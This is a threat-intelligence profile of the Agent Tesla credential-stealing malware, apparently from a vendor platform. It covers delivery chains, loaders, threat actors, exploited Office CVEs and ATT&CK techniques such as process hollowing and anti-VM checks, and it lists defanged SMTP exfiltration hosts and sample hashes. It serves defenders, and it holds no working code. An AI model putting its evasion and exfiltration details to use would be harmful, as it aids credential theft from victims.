Agent Tesla
Agent Tesla is a widely used Windows credential-stealing malware family, commonly described in the provided reporting as an infostealer/password stealer and in some cases associated with RAT-like surveillance features. It is frequently distributed through phishing and malspam campaigns, including malicious email attachments, archive-contained script loaders, PDF-linked phishing lures, and multi-stage .NET or script-based delivery chains. It is also delivered by other malware loaders and ecosystems including GULoader and Amadey, and has been observed hosted on services such as Discord CDN. Reported targeting includes business users broadly, with specific campaigns aimed at finance users, organizations in Türkiye’s financial sector, the logistics sector in Asia, and Italian-language business-themed malspam campaigns; India-themed financial and tax lures were also seen on related infrastructure delivering Agent Tesla among other payloads.
Across the supplied content, Agent Tesla is associated with credential theft from browsers, theft of session cookies and autofill data, clipboard theft, keylogging, screenshot capture, username collection, and exfiltration of stolen data. Some reports also state that Agent Tesla can access the victim’s webcam and record video. Exfiltration methods directly mentioned include SMTP, FTP, Telegram, and other channels; one AhnLab-cited sample used SMTP. Multiple reports describe modern Agent Tesla intrusion chains as heavily obfuscated and fileless or memory-resident, using PowerShell, Batch scripts, Base64-encoded commands, LOLBAS execution, rundll32 abuse, in-memory loading, and process hollowing into legitimate processes such as charmap.exe. Additional observed defense-evasion behaviors include anti-debugging, anti-sandbox, anti-VM checks, use of hidden windows via ProcessWindowStyle.Hidden, and creation of hidden folders.
The malware appears repeatedly in commodity cybercrime distribution ecosystems. GULoader has delivered Agent Tesla alongside NetWire, FormBook, NanoCore, Parallax RAT, Lumma, Vidar, and Remcos. Amadey botnet clusters have distributed Agent Tesla together with Lumma Stealer, Vidar Stealer, StealC, Rugmi, PureCrypter, Rhadamanthys Stealer, RedLine Stealer, SmokeLoader, XWorm, and AsyncRAT. Related infrastructure in other campaigns also delivered Phantom Stealer, DarkCloud, MassLogger variants, FormBook, XWorm, and Snake keyloggers.
High-confidence indicators and infrastructure explicitly tied to Agent Tesla in the content include SMTP exfiltration settings from Unit 42 analysis: hosting2[.]ro.hostsailor[.]com:587 with sender packagelog@gtpv[.]online and receiver package@gtpv[.]online; mail[.]gtpv[.]online:587 with sender kings@gtpv[.]online and receiver king@gtpv[.]online; nffplp[.]com:587 with sender airlet@nffplp[.]com and receiver smt.treat@yandex[.]com; and mail[.]iaa-airferight[.]com:25 with sender accounts admin@iaa-airferight[.]com and web@iaa-airferight[.]com. Sample hashes explicitly identified as Agent Tesla-related include SHA-256 ac5fc65ae9500c1107cdd72ae9c271ba9981d22c4d0c632d388b0d8a3acb68f4, 30b7c09af884dfb7e34aa7401431cdabe6ff34983a59bec4c14915438d68d5b0, and 5487845b06180dfb329757254400cb8663bf92f1eca36c5474e9ce3370cadbde. One phishing case identified by VirusTotal labeled the payload as an AgentTesla variant and described it as a credential and clipboard stealer.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
7 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Instead of relying solely on exploiting unpatched document software as seen in past campaigns that heavily abused known Microsoft Office flaws such as CVE-2017-11882, CVE-2017-0199, and CVE-2018-0802, modern operators are utilizing highly deceptive script-based loaders. | In a recently observed attack, a routine-looking phishing email quietly triggered a full-scale malware compromise, showcasing an advanced Agent Tesla infection chain.
Instead of relying solely on exploiting unpatched document software as seen in past campaigns that heavily abused known Microsoft Office flaws such as CVE-2017-11882, CVE-2017-0199, and CVE-2018-0802, modern operators are utilizing highly deceptive script-based loaders. | In a recently observed attack, a routine-looking phishing email quietly triggered a full-scale malware compromise, showcasing an advanced Agent Tesla infection chain.
Instead of relying solely on exploiting unpatched document software as seen in past campaigns that heavily abused known Microsoft Office flaws such as CVE-2017-11882, CVE-2017-0199, and CVE-2018-0802, modern operators are utilizing highly deceptive script-based loaders. | In a recently observed attack, a routine-looking phishing email quietly triggered a full-scale malware compromise, showcasing an advanced Agent Tesla infection chain.
Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery. | Agent Tesla can collect account information from the victim’s machine. Agent Tesla has used HTTP for C2 communications. Agent Tesla has used SMTP for C2 communications.
...finally deploying stealer and cryptominer malware such as AgentTesla, rhajk, nasqa.
Associated Analytic Story AgentTesla CVE-2023-21716 Word RTF Heap Corruption Compromised Windows Host FIN7 PlugX Warzone RAT
...finally deploying stealer and cryptominer malware such as AgentTesla, rhajk, nasqa.
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
beginning in late 2021, Proofpoint observed this group begin using DiscordApp URLs linking to a compressed file which led to either AgentTesla or Imminent Monitor.
The info stealers most popular with SilverTerrier last year were LokiBot (446 unique samples/month), Pony (330 unique samples/month), and Agent Tesla .NET keylogger (95 unique samples/month).
The group relied exclusively on a variety of publicly available spyware and Remote Access Trojans (RATs), including AgentTesla, Lokibot, AzoRult, Pony, and NetWire.
...finally deploying stealer and cryptominer malware such as AgentTesla, rhajk, nasqa.
"...families of RATs and infostealers. These included Lokibot, Betabot, Formbook, and AgentTesla."
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Initial Access
The user had opened an email 15 minutes before the alert. Subject line: “Outstanding Invoice — Action Required” The attachment? A well-crafted PDF.
Execution
6 techniques
Execution
This was classic LOLBAS (Living-Off-the-Land Binaries and Scripts) abuse... msedge.exe └── powershell.exe └── curl.exe └── downloaded.dll └── rundll32.exe
T1059.001 — PowerShell Execution Malicious script executed via encoded PowerShell commands.
When the attached archive is extracted and opened, the heavily obfuscated Batch script springs into action.
Upon execution, these files kick off a multi-stage chain of extracting, deobfuscating, loading and executing secondary payloads (dynamic-link libraries), eventually detonating the final payload (executable).
Privilege Escalation
2 techniques
Privilege Escalation
Stealth
13 techniques
Stealth
They now employ heavily obfuscated scripts... When the attached archive is extracted and opened, the heavily obfuscated Batch script springs into action.
This article highlights a new obfuscation technique threat actors are using to hide malware through steganography within bitmap resources embedded in otherwise benign 32-bit .NET applications.
Process injection is a critical phase of this operation. By forcing a trusted application like charmap.exe to run the malicious code...
This technique, known as process hollowing, involves creating a new instance of the legitimate process in a suspended state, unmapping its original code, and injecting the malicious payload before resuming the process thread.
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
This was classic LOLBAS (Living-Off-the-Land Binaries and Scripts) abuse... msedge.exe └── powershell.exe └── curl.exe └── downloaded.dll └── rundll32.exe
T1218.011 — Rundll32 Execution Abused rundll32.exe to stealthily execute the malicious DLL.
Furthermore, the payload actively performs anti-sandbox DLL checks and enumerates system hardware to identify virtual machines (Anti-VM). If the code detects artifacts commonly associated with automated malware analysis systems... it abruptly halts execution.
...enumerates system hardware to identify virtual machines (Anti-VM).
Agent Tesla has created hidden folders. AppleJeus has added a leading . to plist filenames, unlisting them from the Finder app and default Terminal directory listings. APT28 has saved files with hidden file attributes. FIN13 has created hidden files and folders within a compromised Linux system /tmp directory and also used attrib.exe to hide gathered local host information.
Agent Tesla has used ProcessWindowStyle.Hidden to hide windows. APT19 used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden. APT28 has used the WindowStyle parameter to conceal PowerShell windows.
Credential Access
4 techniques
Credential Access
Additionally, it features a persistent keylogger that records every keystroke, ensuring that even newly typed passwords are captured.
It aggressively targets sensitive information, sweeping the compromised system to steal browser credentials, session cookies, and saved auto-fill data.
Discovery
5 techniques
Discovery
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
Furthermore, the payload actively performs anti-sandbox DLL checks and enumerates system hardware to identify virtual machines (Anti-VM). If the code detects artifacts commonly associated with automated malware analysis systems... it abruptly halts execution.
Collection
4 techniques
Collection
Additionally, it features a persistent keylogger that records every keystroke, ensuring that even newly typed passwords are captured.
The malware frequently captures screenshots of the active desktop, providing the attackers with real-time visual context of the victim’s activities.
Command and Control
2 techniques
Command and Control
Exfiltration
2 techniques
Exfiltration
IOCs tracked for this family
845 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Agent Tesla is mentioned as a payload distributed by a large botnet cluster within the Amadey ecosystem.
Infostealer referenced as a prior example used in stealer-log analysis.
Additional payload observed on the same delivery infrastructure, indicating a loader-as-a-service operation where final payloads vary.
A remote access trojan/tool mentioned as a payload commonly delivered by GULoader, potentially enabling full remote control of the victim machine.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.